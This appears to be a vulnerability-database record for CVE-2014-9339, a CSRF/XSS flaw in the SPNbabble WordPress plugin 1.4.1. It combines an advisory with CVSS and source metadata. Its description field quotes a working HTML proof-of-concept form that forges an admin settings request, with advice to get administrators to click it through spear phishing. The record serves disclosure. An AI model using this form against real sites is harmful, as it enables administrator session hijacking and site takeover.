VAR-201412-0128
Vulnerability from variot - Updated: 2023-12-18 13:34Multiple cross-site request forgery (CSRF) vulnerabilities in the SPNbabble plugin 1.4.1 and earlier for WordPress allow remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the (1) username or (2) password parameter in the spnbabble.php page to wp-admin/options-general.php. WordPress is a blogging platform developed using the PHP language. Users can set up their own blogs on servers that support PHP and MySQL databases. # Title: CSRF/XSS Vulnerability in SPNbabble WP Plugin
Author: Manideep K
CVE-ID: \xa0CVE-2014-9339
Plugin Homepage: https://wordpress.org/plugins/spnbabble/
Version Affected: 1.4.1 (probably lower versions)
Severity: High
About Plugin:
SPNbabble (http://spnbabble.sitepronews.com) allows users to create an account and post 140 character blogs with urls to send out messages to your followers. Through the professional setup of SPNbabble you can also auto connect to Twitter, Friendfeed, Plurk, Tumblr, Facebook, Zannel, Youare, Meemi & Utterli. This plugin once installed allows you to enter your SPNbabble user and password and you can choose which blog posts will be converted into mini blogs. Your blog turned into several mini blogs on the most popular social media platforms is a great way to keep your message strong.
Description:
Vulnerable Parameter: username, password etc
About Vulnerability: This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin\x92s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc.
Vulnerability Class:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
Steps to Reproduce: (POC):
After installing the plugin You can use the following exploit code to exploit the vulnerability. For testing - you can just save it as .html and then get it clicked with an logged in administrator (by social engineering/spear phishing techniques) and see exploit in action Almost majority of the fields are vulnerable to CSRF + XSS attack
Recommendations:
a) Use proper input filtering techniques b) Use unique tokens such as nonces
Mitigation:
Plugin Closed
Credits:
Manideep K Information Security Researcher https://in.linkedin.com/in/manideepk
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201412-0128",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "spnbabble",
"scope": "eq",
"trust": 1.6,
"vendor": "jayde online",
"version": "1.4.1"
},
{
"model": "spnbabble",
"scope": "lte",
"trust": 0.8,
"vendor": "jayde online",
"version": "1.4.1"
},
{
"model": "spnbabble plugin",
"scope": "lte",
"trust": 0.6,
"vendor": "wordpress",
"version": "\u003c=1.4.1"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-09214"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007342"
},
{
"db": "NVD",
"id": "CVE-2014-9339"
},
{
"db": "CNNVD",
"id": "CNNVD-201412-441"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:jayde_online:spnbabble:1.4.1:*:*:*:*:wordpress:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-9339"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Manideep K",
"sources": [
{
"db": "PACKETSTORM",
"id": "129580"
}
],
"trust": 0.1
},
"cve": "CVE-2014-9339",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2014-9339",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2014-09214",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-9339",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2014-09214",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201412-441",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-09214"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007342"
},
{
"db": "NVD",
"id": "CVE-2014-9339"
},
{
"db": "CNNVD",
"id": "CNNVD-201412-441"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site request forgery (CSRF) vulnerabilities in the SPNbabble plugin 1.4.1 and earlier for WordPress allow remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the (1) username or (2) password parameter in the spnbabble.php page to wp-admin/options-general.php. WordPress is a blogging platform developed using the PHP language. Users can set up their own blogs on servers that support PHP and MySQL databases. # Title: CSRF/XSS Vulnerability in SPNbabble WP Plugin \n# Author: Manideep K\t\n# CVE-ID: \\xa0CVE-2014-9339\n# Plugin Homepage: https://wordpress.org/plugins/spnbabble/\n# Version Affected: 1.4.1 (probably lower versions)\n# Severity: High \n\n# About Plugin:\nSPNbabble (http://spnbabble.sitepronews.com) allows users to create an account and post 140 character blogs with urls to send out messages to your followers. Through the professional setup of SPNbabble you can also auto connect to Twitter, Friendfeed, Plurk, Tumblr, Facebook, Zannel, Youare, Meemi \u0026 Utterli. This plugin once installed allows you to enter your SPNbabble user and password and you can choose which blog posts will be converted into mini blogs. Your blog turned into several mini blogs on the most popular social media platforms is a great way to keep your message strong. \n\n# Description: \n# Vulnerable Parameter: username, password etc\n# About Vulnerability: This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin\\x92s browser can be made to do almost anything the admin user could typically do by hijacking admin\u0027s cookies etc. \n# Vulnerability Class: \t\nhttps://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29\t \nCross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) \n\n# Steps to Reproduce: (POC):\nAfter installing the plugin\nYou can use the following exploit code to exploit the vulnerability. For testing - you can just save it as .html and then get it clicked with an logged in administrator (by social engineering/spear phishing techniques) and see exploit in action\nAlmost majority of the fields are vulnerable to CSRF + XSS attack\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cform action=\"http://localhost/wordpress/wp-admin/options-general.php?page=spnbabble.php\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"username\" value=\"csrf testing\" /\u003e\n \u003cinput type=\"hidden\" name=\"password\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"blogname\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"postprefix\" value=\"New\u0026#32;Blog\u0026#32;Post\u0026#58;\" /\u003e\n \u003cinput type=\"hidden\" name=\"spn\u0026#95;enable\" value=\"Yes\" /\u003e\n \u003cinput type=\"hidden\" name=\"spn\u0026#95;update\" value=\"Yes\" /\u003e\n \u003cinput type=\"hidden\" name=\"info\u0026#95;update\" value=\"Update\u0026#32;Options\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n# Recommendations:\na) Use proper input filtering techniques\nb) Use unique tokens such as nonces\n \n# Mitigation: \nPlugin Closed\n\n# Credits:\nManideep K\nInformation Security Researcher\nhttps://in.linkedin.com/in/manideepk\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-9339"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007342"
},
{
"db": "CNVD",
"id": "CNVD-2014-09214"
},
{
"db": "PACKETSTORM",
"id": "129580"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-9339",
"trust": 3.1
},
{
"db": "PACKETSTORM",
"id": "129580",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007342",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2014-09214",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201412-441",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-09214"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007342"
},
{
"db": "PACKETSTORM",
"id": "129580"
},
{
"db": "NVD",
"id": "CVE-2014-9339"
},
{
"db": "CNNVD",
"id": "CNNVD-201412-441"
}
]
},
"id": "VAR-201412-0128",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-09214"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-09214"
}
]
},
"last_update_date": "2023-12-18T13:34:35.654000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://spnbabble.sitepronews.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-007342"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-007342"
},
{
"db": "NVD",
"id": "CVE-2014-9339"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "http://packetstormsecurity.com/files/129580/wordpress-spnbabble-1.4.1-csrf-xss.html"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9339"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-9339"
},
{
"trust": 0.1,
"url": "https://www.owasp.org/index.php/top_10_2013-a3-cross-site_scripting_(xss))"
},
{
"trust": 0.1,
"url": "https://in.linkedin.com/in/manideepk"
},
{
"trust": 0.1,
"url": "https://www.owasp.org/index.php/cross-site_request_forgery_%28csrf%29"
},
{
"trust": 0.1,
"url": "http://localhost/wordpress/wp-admin/options-general.php?page=spnbabble.php\""
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-9339"
},
{
"trust": 0.1,
"url": "http://spnbabble.sitepronews.com)"
},
{
"trust": 0.1,
"url": "https://wordpress.org/plugins/spnbabble/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-09214"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007342"
},
{
"db": "PACKETSTORM",
"id": "129580"
},
{
"db": "NVD",
"id": "CVE-2014-9339"
},
{
"db": "CNNVD",
"id": "CNNVD-201412-441"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-09214"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007342"
},
{
"db": "PACKETSTORM",
"id": "129580"
},
{
"db": "NVD",
"id": "CVE-2014-9339"
},
{
"db": "CNNVD",
"id": "CNNVD-201412-441"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-12-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-09214"
},
{
"date": "2014-12-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-007342"
},
{
"date": "2014-12-14T14:32:22",
"db": "PACKETSTORM",
"id": "129580"
},
{
"date": "2014-12-19T15:59:22.753000",
"db": "NVD",
"id": "CVE-2014-9339"
},
{
"date": "2014-12-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201412-441"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-12-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-09214"
},
{
"date": "2014-12-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-007342"
},
{
"date": "2014-12-22T12:48:58.110000",
"db": "NVD",
"id": "CVE-2014-9339"
},
{
"date": "2014-12-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201412-441"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201412-441"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "WordPress for SPNbabble Cross-site request forgery vulnerability in plugin",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-007342"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201412-441"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.